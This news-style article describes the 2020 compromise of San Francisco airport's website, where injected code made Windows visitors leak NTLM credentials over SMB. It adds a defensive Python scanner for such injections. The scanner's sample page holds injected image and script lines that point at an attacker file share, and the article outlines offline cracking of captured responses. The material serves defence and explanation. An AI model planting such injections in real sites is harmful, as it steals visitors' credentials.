December 5, 2020

The data breach at San Francisco airport linked to Russian hackers


Earlier, San Francisco International Airport (SFO), California, United States, issued a statement admitting that its website had been hacked and that user account names and password data may have been leaked.

More seriously, the attacker used an indirect technique to steal visitors' Windows login credentials. In other words, the attacker's real target may not have been San Francisco Airport itself.

As for the attackers' background and methods, security researchers at ESET traced the attack and attributed it to the Energetic Bear group. Energetic Bear, also known in the security industry as Dragonfly, is a well-known hacking group from Russia.

This group has been active in various cyber-attacks since 2010, so security companies find it relatively easy to match its code when tracing the source of an attack.

ESET analyzed the malicious code used in the San Francisco Airport attack and found that some of its code and tradecraft closely resemble Energetic Bear's.

However, these are only preliminary findings, so the true originator cannot yet be determined with certainty. San Francisco Airport is cooperating with local law enforcement agencies in investigating the attack.

What is more surprising is that, for all the effort the attacker put into the intrusion, the target was not San Francisco Airport's own data. The attacker had other plans.

The investigation found that the attacker embedded malicious code in the San Francisco Airport website, consisting of malicious JavaScript and a reference to a specially crafted one-pixel image.

When a Windows user visits the site, the injected code makes the browser request that image from a file share on a server the attacker controls, rather than from the airport's web server.

Because the image is referenced by a file path rather than a normal web address, Windows tries to fetch it over SMB, and by default it authenticates to the remote server using NTLM, sending the user's account name together with an NTLM challenge-response value derived from the user's password hash.
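As an added example (not code from the article or from ESET's analysis), here is a check a site owner can run over their own pages to spot this kind of injection. It parses the HTML and flags any fetchable attribute, or any string literal inside an inline script, that points at a `file:` URL or a UNC path, and reports the host that Windows would try to authenticate to over SMB. The sample page and the host `203.0.113.5` are constructed for the example.

```python
import re
from html.parser import HTMLParser

# Attributes whose value the browser fetches automatically or on click.
FETCH_ATTRS = {"src", "href", "data", "action", "poster", "background", "srcset"}

# A file: URL or a UNC path (\\host\share\...). A Windows browser that follows
# one of these asks the OS to open it over SMB, which by default sends an NTLM
# authentication attempt to the named host.
SMB_REF = re.compile(r"(?:file:/*|\\\\)[^\s\"'<>]+", re.IGNORECASE)


def referenced_host(ref: str) -> str:
    """Extract the host part of a file: URL or UNC path ('' if there is none)."""
    stripped = re.sub(r"^(?:file:)?[\\/]+", "", ref, flags=re.IGNORECASE)
    return re.split(r"[\\/]", stripped, maxsplit=1)[0].lower()


class _Collector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []          # (tag, attribute, reference) in document order
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script = True
        for name, value in attrs:
            if value and name in FETCH_ATTRS:
                for m in SMB_REF.finditer(value):
                    self.findings.append((tag, name, m.group(0)))

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # Injected JavaScript usually creates the element at runtime, so the
        # UNC path only appears as a string literal inside the script body.
        if self._in_script:
            for m in SMB_REF.finditer(data):
                self.findings.append(("script", "inline", m.group(0)))


def scan_html(page: str):
    """Return (tag, attribute, reference, host) for every resource that would
    make a Windows client open an SMB connection to a remote host."""
    parser = _Collector()
    parser.feed(page)
    parser.close()
    results = []
    for tag, attr, ref in parser.findings:
        host = referenced_host(ref)
        # file:///C:/... points at a local drive, not a remote host; skip it.
        if host and not host.endswith(":"):
            results.append((tag, attr, ref, host))
    return results


# Constructed sample page: one legitimate image, one injected <img> pointing at
# an attacker-controlled share, and one injected script doing the same at runtime.
SAMPLE_PAGE = r"""<html><body>
<img src="/static/logo.png" alt="legitimate">
<a href="https://example.com/login">Sign in</a>
<img src="file://203.0.113.5/share/pixel.png" width="1" height="1">
<script>
  var t = document.createElement("img");
  t.src = "\\\\203.0.113.5\\share\\pixel.png";
  document.body.appendChild(t);
</script>
</body></html>"""


if __name__ == "__main__":
    for tag, attr, ref, host in scan_html(SAMPLE_PAGE):
        print(f"{tag}[{attr}] -> {ref}  (SMB auth would go to {host})")
```

Two caveats for anyone using this in practice. First, current Chrome and Firefox refuse to load `file:` resources from a web page, so the leak only affects visitors whose browser follows such references (Internet Explorer did). Second, the scan only sees what is in the HTML you feed it; code injected by a compromised third-party script is only visible if you fetch and scan that script as well.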

Although what reaches the attacker's server is not the password itself but an NTLM challenge-response (a value derived from the password hash), the attacker can still recover the plaintext password offline by brute-force or dictionary guessing, which is quick for weak passwords.

With a valid account name and password, the attacker can then go after specific users, especially corporate users, for example by logging into their systems and stealing sensitive information.

San Francisco Airport has now reset all account passwords on its website, but users who logged into the website from a Windows computer should also change their Windows password, since that is the credential the attack actually captured. Organizations can prevent this class of credential leak regardless of website content by blocking outbound SMB (TCP port 445) at their network edge and restricting outgoing NTLM authentication in Windows policy.